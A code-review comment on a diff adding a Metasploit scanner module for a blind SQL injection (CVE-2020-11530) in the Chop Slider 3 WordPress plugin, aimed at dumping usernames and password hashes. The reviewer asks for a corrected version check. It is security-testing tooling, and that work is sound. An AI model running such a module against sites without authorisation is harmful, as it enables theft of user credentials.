modules/auxiliary/scanner/http/wp_chopslider_id_sqli.rb

```diff
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress ChopSlider3 id SQLi Scanner',
+        'Description' => %q{
+          The iDangero.us Chop Slider 3 WordPress plugin prior to version 3.4
+          contains a blind SQL injection in the id parameter of the
+          get_sript/index.php page.  The injection is passed through GET
+          parameters, and thus must be encoded,
+          and magic_quotes is applied at the server.
+        },
+        'Author' =>
+          [
+            'h00die', # msf module
+            'SunCSR', # edb module
+            'Callum Murphy <callum.a.murphy.77@gmail.com>' # full disclosure
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['EDB', '48457'],
+            ['CVE', '2020-11530'],
+            ['URL', 'https://seclists.org/fulldisclosure/2020/May/26']
+          ],
+        'Actions' => [
+          ['List Users', 'Description' => 'Queries username, password hash for COUNT users'],
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2020-05-12'
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 1]),
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      vprint_error('Server not online or not detected as wordpress')
+      return
+    end
+
+    checkcode = check_plugin_version_from_readme('chopslider', '3.4')
```

Comment:
In my understanding, version 3.4 is vulnerable and there is no newer version available. If this is correct, the the `fixed_version` argument of `check_plugin_version_from_readme` should be set to `nil` and `vuln_introduced_version` should be set to `3.0`, assuming the whole branch is affected:
```suggestion
    checkcode = check_plugin_version_from_readme('chopslider', nil, '3.0')
```